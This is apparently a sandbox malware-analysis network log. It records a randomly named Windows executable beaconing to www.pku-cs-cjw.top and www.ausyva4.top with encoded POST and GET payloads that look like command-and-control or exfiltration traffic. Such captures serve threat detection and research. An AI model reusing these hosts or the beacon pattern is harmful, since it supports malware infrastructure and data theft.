Jan 10, 2025 20:25:40.561223030 CET	725	OUT	POST /k3hn/ HTTP/1.1 Host: www.pku-cs-cjw.top Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8 Accept-Encoding: gzip, deflate, br Accept-Language: en-us Content-Type: application/x-www-form-urlencoded Cache-Control: max-age=0 Content-Length: 196 Connection: close Origin: http://www.pku-cs-cjw.top Referer: http://www.pku-cs-cjw.top/k3hn/ User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; fr; rv:1.9.1.5) Gecko/20091102 Firefox/3.5.5 ( .NET CLR 3.5.30729) Data Raw: 72 56 75 34 53 78 46 3d 51 62 31 39 6b 42 55 6f 6c 5a 5a 78 59 59 74 4a 4e 31 74 49 6c 58 39 39 6a 70 6f 64 70 32 42 55 7a 2b 6e 58 30 4d 79 4c 6e 62 33 33 4e 62 57 4a 42 4d 75 61 4b 64 73 4b 34 65 5a 79 2f 6a 47 49 54 6f 53 4b 78 67 55 64 55 52 56 48 7a 6b 6a 43 37 49 35 4f 72 47 45 6e 76 77 69 4e 4b 54 35 79 6f 37 6d 36 7a 74 6e 4b 7a 4a 47 49 46 51 32 55 72 34 69 42 4d 47 69 6c 61 77 43 42 78 31 33 74 4d 79 6e 59 72 6f 30 47 41 79 79 2f 54 56 39 59 62 61 42 50 49 42 74 49 76 35 4d 56 56 4d 63 35 52 30 46 6a 41 54 6c 41 48 62 70 32 2f 4b 4d 46 77 6b 65 69 64 51 79 4f 45 6d 55 6e Data Ascii: rVu4SxF=Qb19kBUolZZxYYtJN1tIlX99jpodp2BUz+nX0MyLnb33NbWJBMuaKdsK4eZy/jGIToSKxgUdURVHzkjC7I5OrGEnvwiNKT5yo7m6ztnKzJGIFQ2Ur4iBMGilawCBx13tMynYro0GAyy/TV9YbaBPIBtIv5MVVMc5R0FjATlAHbp2/KMFwkeidQyOEmUn
Jan 10, 2025 20:25:40.988401890 CET	357	IN	HTTP/1.1 405 Method Not Allowed Connection: close Content-Length: 131 Server: Varnish Retry-After: 0 Accept-Ranges: bytes Date: Fri, 10 Jan 2025 19:25:40 GMT Via: 1.1 varnish X-Served-By: cache-ewr-kewr1740060-EWR X-Cache: MISS X-Cache-Hits: 0 X-Timer: S1736537141.941038,VS0,VE0 X-Fastly-Request-ID: 918861348159d182f935338d49772f65b97b8227
Jan 10, 2025 20:25:41.028234959 CET	131	IN	Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0a 3c 63 65 6e 74 65 72 3e Data Ascii: <html><head><title>405 Not Allowed</title></head><body bgcolor="white"><center><h1>405 Not Allowed</h1></center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.9	55718	185.199.108.153	80	6180	C:\Program Files (x86)\dPXXiWVSDxKzfLUwmayieFrObYVAaSiCnLexfNoBdvJRwRRREiXBhaWN\kObgmFzfBE.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 20:25:43.121005058 CET	749	OUT	POST /k3hn/ HTTP/1.1 Host: www.pku-cs-cjw.top Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8 Accept-Encoding: gzip, deflate, br Accept-Language: en-us Content-Type: application/x-www-form-urlencoded Cache-Control: max-age=0 Content-Length: 220 Connection: close Origin: http://www.pku-cs-cjw.top Referer: http://www.pku-cs-cjw.top/k3hn/ User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; fr; rv:1.9.1.5) Gecko/20091102 Firefox/3.5.5 ( .NET CLR 3.5.30729) Data Raw: 72 56 75 34 53 78 46 3d 51 62 31 39 6b 42 55 6f 6c 5a 5a 78 61 34 39 4a 4d 55 74 49 6e 33 39 38 76 4a 6f 64 6a 57 42 51 7a 2b 72 58 30 4a 57 69 6e 70 6a 33 4f 37 47 4a 41 4f 57 61 47 39 73 4b 73 4f 5a 7a 37 6a 47 50 54 6f 65 73 78 68 6f 64 55 52 42 48 7a 67 6e 43 37 35 35 50 71 57 45 6c 67 51 69 4c 4a 6a 35 79 6f 37 6d 36 7a 74 6a 67 7a 4a 4f 49 47 6c 6d 55 6f 62 36 65 46 6d 69 6b 4b 67 43 42 6d 46 33 70 4d 79 6e 32 72 73 56 4f 41 77 61 2f 54 51 52 59 43 75 31 4f 43 42 74 4f 77 70 4d 4c 62 38 42 67 53 33 35 49 47 7a 35 70 59 49 4a 57 34 72 77 62 68 57 58 35 49 48 79 70 44 42 64 50 41 53 56 44 73 76 67 4f 73 6b 71 47 4d 65 50 61 49 6e 7a 4c 53 77 3d 3d Data Ascii: rVu4SxF=Qb19kBUolZZxa49JMUtIn398vJodjWBQz+rX0JWinpj3O7GJAOWaG9sKsOZz7jGPToesxhodURBHzgnC755PqWElgQiLJj5yo7m6ztjgzJOIGlmUob6eFmikKgCBmF3pMyn2rsVOAwa/TQRYCu1OCBtOwpMLb8BgS35IGz5pYIJW4rwbhWX5IHypDBdPASVDsvgOskqGMePaInzLSw==
Jan 10, 2025 20:25:43.564985037 CET	488	IN	HTTP/1.1 405 Method Not Allowed Connection: close Content-Length: 131 Server: Varnish Retry-After: 0 Accept-Ranges: bytes Date: Fri, 10 Jan 2025 19:25:43 GMT Via: 1.1 varnish X-Served-By: cache-ewr-kewr1740068-EWR X-Cache: MISS X-Cache-Hits: 0 X-Timer: S1736537144.514202,VS0,VE0 X-Fastly-Request-ID: 757c991f1bbbcb3bf0b7e4175617aab68e4b1106 Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e Data Ascii: <html><head><title>405 Not Allowed</title></head><body bgcolor="white"><center><h1>405 Not Allowed</h1></center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.9	55719	185.199.108.153	80	6180	C:\Program Files (x86)\dPXXiWVSDxKzfLUwmayieFrObYVAaSiCnLexfNoBdvJRwRRREiXBhaWN\kObgmFzfBE.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 20:25:45.675898075 CET	1762	OUT	POST /k3hn/ HTTP/1.1 Host: www.pku-cs-cjw.top Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8 Accept-Encoding: gzip, deflate, br Accept-Language: en-us Content-Type: application/x-www-form-urlencoded Cache-Control: max-age=0 Content-Length: 1232 Connection: close Origin: http://www.pku-cs-cjw.top Referer: http://www.pku-cs-cjw.top/k3hn/ User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; fr; rv:1.9.1.5) Gecko/20091102 Firefox/3.5.5 ( .NET CLR 3.5.30729) Data Raw: 72 56 75 34 53 78 46 3d 51 62 31 39 6b 42 55 6f 6c 5a 5a 78 61 34 39 4a 4d 55 74 49 6e 33 39 38 76 4a 6f 64 6a 57 42 51 7a 2b 72 58 30 4a 57 69 6e 70 37 33 4f 4a 2b 4a 42 70 36 61 49 64 73 4b 7a 2b 5a 32 37 6a 48 54 54 6f 57 6f 78 68 6c 67 55 53 35 48 7a 44 76 43 73 37 52 50 6b 57 45 6c 69 51 69 4b 4b 54 34 32 6f 37 32 32 7a 74 54 67 7a 4a 4f 49 47 69 65 55 38 34 69 65 44 6d 69 6c 61 77 43 64 78 31 33 52 4d 79 2f 41 72 71 4a 65 41 41 36 2f 55 77 42 59 5a 39 64 4f 66 78 74 4d 7a 70 4e 59 62 38 4e 46 53 7a 59 35 47 77 6c 48 59 49 68 57 37 74 31 66 2b 6e 76 59 61 78 32 68 57 43 70 50 46 31 67 6e 71 39 64 55 73 48 4b 68 61 4d 57 76 46 54 61 62 42 4d 6b 58 63 69 36 58 55 68 54 6c 55 66 73 6c 58 4e 77 75 57 48 31 70 58 36 4d 57 44 43 35 59 4c 31 59 33 62 75 67 47 67 4f 4f 53 36 47 5a 4f 31 35 73 76 65 55 73 33 55 67 63 31 30 5a 33 62 56 75 70 46 65 4f 6b 67 43 75 61 73 5a 34 7a 37 34 66 70 32 4e 6a 71 58 4a 76 66 74 39 43 54 39 69 54 73 68 38 78 6d 64 45 79 70 55 73 4f 79 6b 37 39 75 33 4f 64 67 49 4e 41 [TRUNCATED] Data Ascii: rVu4SxF=Qb19kBUolZZxa49JMUtIn398vJodjWBQz+rX0JWinp73OJ+JBp6aIdsKz+Z27jHTToWoxhlgUS5HzDvCs7RPkWEliQiKKT42o722ztTgzJOIGieU84ieDmilawCdx13RMy/ArqJeAA6/UwBYZ9dOfxtMzpNYb8NFSzY5GwlHYIhW7t1f+nvYax2hWCpPF1gnq9dUsHKhaMWvFTabBMkXci6XUhTlUfslXNwuWH1pX6MWDC5YL1Y3bugGgOOS6GZO15sveUs3Ugc10Z3bVupFeOkgCuasZ4z74fp2NjqXJvft9CT9iTsh8xmdEypUsOyk79u3OdgINAgM9nrMMneuWiZd+/Cf1ide2SSh7oYlohEcaorBp0YH3OZw9E56wm41Xzvp3/K97Y8GbSwGYv5qMP6fPCYTIPOUG4PifIEtqwi+E6+rK/JIXr308GIbdXXbsjScpug2WVsNk8BlHKsDVkd9TuuWawmijnKuZsd/tZEMm/EeKYayy9jo8c1ie0aautTunBBuMRRdJMImaltGH+cR4HG/YnOq1EnK92JJWNnDpHNcYiln3gms2F5uY2RzED4qDF7nFO1UZoKJTWDTpzZz1568cjrdR4ecchJnZ+BqkJy9W1hyp9AtVJ3348njrg9PPoOe2Yr2rAtxoTGfqNT0gfD0MBSthWfLlDytuEeBV3m5NhHvXryZNL/lbMu8H0JtfTSitInfG9Htl9CBrk4BZEi/Vur5ug+gE49jtxCauXcq5q0naCGBE52c2OblDKu2bhF4DEb1/EdhWEcTPlhORaCWQprFnxzFvzB2DNEffQGQ3+BJsSXziE2sLRZMlI1+L/l4krAyFiV0YiNaKE954XlHdqtV6gbgBEsvw65lFwF7GJiaMI/ZKEmN8v75M/1hQxC8u9T6qZ9c+q3nguiCcuGGJqu2HciEtxZ2LFBJtLB5s1ZabCCM6c12+HFCW/Qfl2SA2m26NKLsBa6FurkLJWWxMtVixi/UgeJQBYIe [TRUNCATED]
Jan 10, 2025 20:25:46.144697905 CET	488	IN	HTTP/1.1 405 Method Not Allowed Connection: close Content-Length: 131 Server: Varnish Retry-After: 0 Accept-Ranges: bytes Date: Fri, 10 Jan 2025 19:25:46 GMT Via: 1.1 varnish X-Served-By: cache-ewr-kewr1740035-EWR X-Cache: MISS X-Cache-Hits: 0 X-Timer: S1736537146.096396,VS0,VE0 X-Fastly-Request-ID: 01294b41b8f3d5518c561576320b42de885b86fa Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e Data Ascii: <html><head><title>405 Not Allowed</title></head><body bgcolor="white"><center><h1>405 Not Allowed</h1></center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.9	55720	185.199.108.153	80	6180	C:\Program Files (x86)\dPXXiWVSDxKzfLUwmayieFrObYVAaSiCnLexfNoBdvJRwRRREiXBhaWN\kObgmFzfBE.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 20:25:48.216499090 CET	458	OUT	GET /k3hn/?rVu4SxF=dZddn2QnmIt3Z4tuH0E3g34XkYAItSNhr8Xg5sy2kai1E7eSB/izKfIU3bxH1QSpc7GJ9Hdmeil28QjfyJs8j2YhgReETzRCnNPRybqTpZLdK0zipA==&JXYh=X6eL8Vp0 HTTP/1.1 Host: www.pku-cs-cjw.top Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8 Accept-Language: en-us Connection: close User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; fr; rv:1.9.1.5) Gecko/20091102 Firefox/3.5.5 ( .NET CLR 3.5.30729)
Jan 10, 2025 20:25:48.702064991 CET	635	IN	HTTP/1.1 301 Moved Permanently Connection: close Content-Length: 162 Server: GitHub.com Content-Type: text/html X-GitHub-Request-Id: B8C4:E0016:ECB3ED:1058453:6781743C Accept-Ranges: bytes Age: 0 Date: Fri, 10 Jan 2025 19:25:48 GMT Via: 1.1 varnish X-Served-By: cache-nyc-kteb1890042-NYC X-Cache: MISS X-Cache-Hits: 0 X-Timer: S1736537149.611557,VS0,VE41 Vary: Accept-Encoding X-Fastly-Request-ID: 0c259c38648ad50408224bf63ed104be222bdfba Location: http://pku-cs-cjw.top/k3hn/?rVu4SxF=dZddn2QnmIt3Z4tuH0E3g34XkYAItSNhr8Xg5sy2kai1E7eSB/izKfIU3bxH1QSpc7GJ9Hdmeil28QjfyJs8j2YhgReETzRCnNPRybqTpZLdK0zipA==&JXYh=X6eL8Vp0
Jan 10, 2025 20:25:48.728008986 CET	162	IN	Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.9	55721	104.21.48.233	80	6180	C:\Program Files (x86)\dPXXiWVSDxKzfLUwmayieFrObYVAaSiCnLexfNoBdvJRwRRREiXBhaWN\kObgmFzfBE.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 20:25:54.146045923 CET	716	OUT	POST /al74/ HTTP/1.1 Host: www.ausyva4.top Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8 Accept-Encoding: gzip, deflate, br Accept-Language: en-us Content-Type: application/x-www-form-urlencoded Cache-Control: max-age=0 Content-Length: 196 Connection: close Origin: http://www.ausyva4.top Referer: http://www.ausyva4.top/al74/ User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; fr; rv:1.9.1.5) Gecko/20091102 Firefox/3.5.5 ( .NET CLR 3.5.30729) Data Raw: 72 56 75 34 53 78 46 3d 34 44 4c 4d 64 4e 57 4e 6a 51 6d 50 78 64 31 54 45 6a 4b 61 7a 66 77 42 6e 6a 57 78 55 50 68 77 63 54 4c 44 55 36 6a 42 61 74 52 41 76 62 76 45 5a 48 55 39 72 32 68 63 63 54 39 72 79 62 55 44 30 4d 47 4c 6c 6e 41 79 31 36 58 53 2b 49 6c 53 45 33 54 48 75 42 49 5a 66 37 54 6f 63 78 76 34 52 5a 2b 66 75 42 66 76 48 66 37 49 37 47 48 57 49 37 6d 35 58 6e 48 53 5a 5a 4b 38 4b 6e 65 2b 65 59 66 67 49 4e 37 64 35 4d 4d 32 57 67 39 43 6a 73 6e 79 6e 37 74 62 50 46 62 38 36 35 78 50 32 36 6b 64 32 6c 65 76 71 4a 6c 30 41 47 2f 63 59 46 67 47 59 47 42 71 6f 76 74 57 Data Ascii: rVu4SxF=4DLMdNWNjQmPxd1TEjKazfwBnjWxUPhwcTLDU6jBatRAvbvEZHU9r2hccT9rybUD0MGLlnAy16XS+IlSE3THuBIZf7Tocxv4RZ+fuBfvHf7I7GHWI7m5XnHSZZK8Kne+eYfgIN7d5MM2Wg9Cjsnyn7tbPFb865xP26kd2levqJl0AG/cYFgGYGBqovtW
Jan 10, 2025 20:25:54.768569946 CET	1162	IN	HTTP/1.1 404 Not Found Date: Fri, 10 Jan 2025 19:25:54 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: close cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=JiDEyStQ0FgCZ%2FyHDcQo2tRgXQgh7oxZ3bHKcx3AkgNxjjsR4uOALuRg9T5i%2FiXBgdkWzhU%2FxoVT0tAHEdnFBj%2Baswqfx4JlP%2Bjx8OGtqIj48I9lD7gdHxqdz4%2BHZg9qBfI%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8fff0e3ff844335a-EWR Content-Encoding: gzip alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=2136&min_rtt=2136&rtt_var=1068&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=716&delivery_rate=0&cwnd=230&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 31 36 34 0d 0a 1f 8b 08 00 00 00 00 00 00 03 75 91 d1 6b 22 31 10 c6 df 05 ff 87 a9 ef 3a bb de 4a 41 42 1e ae 2a 2d 78 3d a9 5b b8 7b 8c 66 34 a1 31 23 d9 59 97 fd ef 0f b7 6e 91 c2 bd e4 cb 64 e6 f7 31 e1 53 0f 8b df 4f e5 df cd 12 9e cb 5f 6b d8 bc ff 5c bf 3c c1 68 8c f8 b2 2c 57 88 8b 72 f1 d9 99 4e 32 c4 e5 eb 48 0f 07 ca c9 29 74 4a c6 6a 25 5e 02 e9 22 2b e0 95 05 56 5c 47 ab f0 f3 51 61 37 32 1c a8 1d db f6 aa 7b 8a 42 49 2b 97 7f 27 5c ae 15 de da c3 01 6c 39 a5 16 0e 9c 40 1c 81 8f 7b 8e 17 8a 9e e2 9e 26 6a 97 50 0f 07 9b 40 a6 22 48 74 e6 24 20 ce 57 70 a2 aa 32 47 02 13 ed 95 09 b5 a5 8e 3f 70 08 dc f8 78 04 1f 0f 9c 4e 46 3c 47 10 86 ba ea dd 4a 67 e2 07 b4 5c c3 85 52 0b a7 7a ef 1e 14 9e af 4b 8b d9 05 ea 2e a9 3b ad 7e 7f 5b cf 15 8a bd 95 4e e4 3c 47 6c 9a 66 62 ea aa bd 98 62 22 7c 46 13 1e 0b ec c7 f0 06 f7 16 5b 4a 17 4a f7 2e a1 66 eb 5b 1a 9b a6 1a 47 b6 94 ff 0f 5d 18 a1 7b 70 9a 4d 67 98 e5 98 e7 90 fd 98 4f 67 f3 59 f1 0d c5 af 2f b8 84 7a c3 0d 25 b2 b0 6b e1 8f 72 49 f7 [TRUNCATED] Data Ascii: 164uk"1:JAB*-x=[{f41#Ynd1SO_k\<h,WrN2H)tJj%^"+V\GQa72{BI+'\l9@{&jP@"Ht$ Wp2G?pxNF<GJg\RzK.;~[N<Glfbb"\|F[JJ.f[G]{pMgOgY/z%krIt>8%l1
Jan 10, 2025 20:25:54.769889116 CET	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.9	55722	104.21.48.233	80	6180	C:\Program Files (x86)\dPXXiWVSDxKzfLUwmayieFrObYVAaSiCnLexfNoBdvJRwRRREiXBhaWN\kObgmFzfBE.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 20:25:56.690526009 CET	740	OUT	POST /al74/ HTTP/1.1 Host: www.ausyva4.top Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8 Accept-Encoding: gzip, deflate, br Accept-Language: en-us Content-Type: application/x-www-form-urlencoded Cache-Control: max-age=0 Content-Length: 220 Connection: close Origin: http://www.ausyva4.top Referer: http://www.ausyva4.top/al74/ User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; fr; rv:1.9.1.5) Gecko/20091102 Firefox/3.5.5 ( .NET CLR 3.5.30729) Data Raw: 72 56 75 34 53 78 46 3d 34 44 4c 4d 64 4e 57 4e 6a 51 6d 50 2b 66 68 54 42 41 53 61 69 50 78 7a 37 7a 57 78 65 76 67 33 63 53 33 44 55 37 57 61 61 37 4a 41 6f 36 66 45 58 6d 55 39 71 32 68 63 57 7a 39 71 74 4c 55 4b 30 4d 43 70 6c 6d 38 79 31 36 54 53 2b 49 31 53 44 41 48 41 76 52 49 68 55 62 54 6d 66 42 76 34 52 5a 2b 66 75 42 4c 56 48 66 6a 49 37 79 37 57 4a 61 6d 32 4c 33 48 52 4e 4a 4b 38 42 48 65 69 65 59 66 43 49 4d 6d 4b 35 50 6b 32 57 67 4e 43 69 2b 50 78 70 37 74 5a 58 6c 61 59 73 38 41 68 79 74 34 55 78 46 4f 64 77 5a 31 32 4b 48 44 43 4a 33 70 64 4e 52 42 4e 76 49 6b 2b 79 63 35 73 73 46 6c 75 56 6b 54 56 31 53 54 76 5a 61 2b 63 73 51 3d 3d Data Ascii: rVu4SxF=4DLMdNWNjQmP+fhTBASaiPxz7zWxevg3cS3DU7Waa7JAo6fEXmU9q2hcWz9qtLUK0MCplm8y16TS+I1SDAHAvRIhUbTmfBv4RZ+fuBLVHfjI7y7WJam2L3HRNJK8BHeieYfCIMmK5Pk2WgNCi+Pxp7tZXlaYs8Ahyt4UxFOdwZ12KHDCJ3pdNRBNvIk+yc5ssFluVkTV1STvZa+csQ==
Jan 10, 2025 20:25:57.360820055 CET	1158	IN	HTTP/1.1 404 Not Found Date: Fri, 10 Jan 2025 19:25:57 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: close cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=pizrS3w%2FJy8kDMUVJyUykuQ9LDpk3g8Zch4B3QDQ30D%2FV6z9A33e84yAJXiP9oNF23DAal1cXD0T%2BYeazCETdum4AGv9Y7P7nD4DYcxzCbKRhcOba05kyQTczNzzfP6AEmM%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8fff0e4fdc3a7cac-EWR Content-Encoding: gzip alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1991&min_rtt=1991&rtt_var=995&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=740&delivery_rate=0&cwnd=200&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 31 36 32 0d 0a 1f 8b 08 00 00 00 00 00 00 03 75 91 41 6b 02 31 10 85 ef 82 ff 61 da bb ce ae 55 0a 12 72 68 b5 b4 60 5b a9 5b 68 8f d1 8c 26 34 66 24 3b eb b2 ff be b8 75 8b 14 7a c9 cb 64 e6 7b 4c 78 ea 6a f6 7a 5f 7c 2e e7 f0 58 3c 2f 60 f9 7e b7 78 ba 87 eb 01 e2 d3 bc 78 40 9c 15 b3 9f ce 68 98 21 ce 5f ae 75 bf a7 9c ec 43 ab 64 ac 56 e2 25 90 1e 67 63 78 61 81 07 ae a2 55 f8 f3 a8 b0 1d e9 f7 d4 9a 6d 73 d2 0d 45 a1 a4 95 cb ff 12 2e d7 0a cf ed 7e 0f 56 9c 52 03 5b 4e 20 8e c0 c7 0d c7 23 45 4f 71 43 43 b5 4e a8 fb bd 65 20 53 12 24 3a 70 12 10 e7 4b d8 53 59 9a 1d 81 89 f6 c4 84 ca 52 cb 6f 39 04 ae 7d dc 81 8f 5b 4e 7b 23 9e 23 08 43 55 76 6e 85 33 f1 0b 1a ae e0 48 a9 81 7d b5 71 57 0a 0f a7 a5 c5 ac 03 b5 97 d4 9e 56 bf bf 2d a6 0a c5 9e 4b 27 72 98 22 d6 75 3d 34 55 d9 1c cd 78 28 7c 40 13 6e c7 d8 8d e1 19 ee 2c 56 94 8e 94 2e 5d 42 c5 d6 37 34 30 75 39 88 6c 29 ff 0f 9d 19 a1 4b 70 94 8d 26 98 e5 98 e7 90 dd 4c 47 93 e9 e4 f6 0f 8a bf 5f 70 09 f5 92 6b 4a 64 61 dd c0 87 72 49 77 a9 08 [TRUNCATED] Data Ascii: 162uAk1aUrh`[[h&4f$;uzd{Lxjz_\|.X</`~xx@h!_uCdV%gcxaUmsE.~VR[N #EOqCCNe S$:pKSYRo9}[N{##CUvn3H}qWV-K'r"u=4Ux(\|@n,V.]B740u9l)Kp&LG_pkJdarIwt.8<vz10

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.9	55723	104.21.48.233	80	6180	C:\Program Files (x86)\dPXXiWVSDxKzfLUwmayieFrObYVAaSiCnLexfNoBdvJRwRRREiXBhaWN\kObgmFzfBE.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 20:25:59.239304066 CET	1753	OUT	POST /al74/ HTTP/1.1 Host: www.ausyva4.top Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8 Accept-Encoding: gzip, deflate, br Accept-Language: en-us Content-Type: application/x-www-form-urlencoded Cache-Control: max-age=0 Content-Length: 1232 Connection: close Origin: http://www.ausyva4.top Referer: http://www.ausyva4.top/al74/ User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; fr; rv:1.9.1.5) Gecko/20091102 Firefox/3.5.5 ( .NET CLR 3.5.30729) Data Raw: 72 56 75 34 53 78 46 3d 34 44 4c 4d 64 4e 57 4e 6a 51 6d 50 2b 66 68 54 42 41 53 61 69 50 78 7a 37 7a 57 78 65 76 67 33 63 53 33 44 55 37 57 61 61 37 42 41 76 4d 4c 45 58 42 34 39 34 6d 68 63 56 7a 39 33 74 4c 56 59 30 4b 71 74 6c 6d 77 49 31 34 62 53 2b 71 4e 53 43 31 72 41 68 52 49 68 62 37 54 6e 63 78 75 77 52 64 6a 57 75 42 62 56 48 66 6a 49 37 7a 72 57 4f 4c 6d 32 62 48 48 53 5a 5a 4b 47 4b 6e 65 47 65 63 37 34 49 4d 6a 33 6c 75 45 32 57 41 64 43 67 4c 54 78 32 4c 74 66 43 6c 61 41 73 38 45 69 79 70 59 59 78 47 54 4b 77 62 6c 32 49 54 69 69 51 32 6b 46 55 69 64 35 34 76 34 47 39 63 5a 46 70 68 41 47 44 42 7a 62 71 7a 6e 2f 63 62 72 76 32 74 38 6d 62 67 67 62 69 4a 65 79 6d 70 64 35 69 6e 6d 4d 57 6f 62 43 75 66 7a 42 71 30 35 53 52 68 41 49 56 42 46 38 35 43 61 55 6d 4b 69 73 41 65 59 30 78 76 61 50 74 4f 4d 77 64 34 54 74 42 4d 4a 66 38 31 6e 2b 6e 75 44 4b 35 6c 52 34 45 39 35 59 69 33 51 47 74 55 67 4b 38 30 31 44 55 70 67 58 57 59 61 30 53 48 2f 38 33 39 6f 39 69 42 36 68 66 50 41 6b 6c 43 [TRUNCATED] Data Ascii: rVu4SxF=4DLMdNWNjQmP+fhTBASaiPxz7zWxevg3cS3DU7Waa7BAvMLEXB494mhcVz93tLVY0KqtlmwI14bS+qNSC1rAhRIhb7TncxuwRdjWuBbVHfjI7zrWOLm2bHHSZZKGKneGec74IMj3luE2WAdCgLTx2LtfClaAs8EiypYYxGTKwbl2ITiiQ2kFUid54v4G9cZFphAGDBzbqzn/cbrv2t8mbggbiJeympd5inmMWobCufzBq05SRhAIVBF85CaUmKisAeY0xvaPtOMwd4TtBMJf81n+nuDK5lR4E95Yi3QGtUgK801DUpgXWYa0SH/839o9iB6hfPAklC+HBw7vKx7MuUy0SyrUNKdicPjv02X9ZAAbjKqq9XWg9e0lkA+vsqS4p2bIJ6XZA28LKyWgGySO0L1XaAIfe2wqU8g/V56jUTGca3mZYIVJmKHaQaYzkLRom+GNC7X28aQzANyfDZN+KQQs3SxZaQrFtBY3XBBVyBL6tbOcqlYgX9FK2yrNJrXYHddFt7d0jj00tmh3xJBmrnkpkWEUNerU7B451k9qOI3drDw8rVzaalqqRoL/Qa9VxbVFoO6NlopbsvMq52woe484siK+d6xGHeY0MEbfbnYpG+ab2gFFOWObtsG6LjZhnz2R5ObIQo9JG9MbgcVHIa97vZJXE13IhiavQ5TT2hJCOfmqauIcHf5jkOT3mvVv8GXxUHAfC/A05KfIZRwcqtEntJLwfSf6ofhKEu0rVIF/RODCTX3b9NOixEa6+zOXcmRgq8RPOpJZFhSW7PbbJPZMJLCGItA06paHx4GoFui59yS9yFCcD7HGlK7Xv1qsCxscJ+iVO+6mtbQN7cJZVFvDEuNYztdCu5JjeJztPZqV7doNM3nqBMTT/K+qoqv76cq7RuNhj2tnkCwM2FzLnDkoh8r50QXYSASRfJ343PAtePO/bdjDEEMO2c9zufZp6XhD2ot8XCHS5EX5kE+eMfsixPth86r5frFGI3c8hbA3 [TRUNCATED]
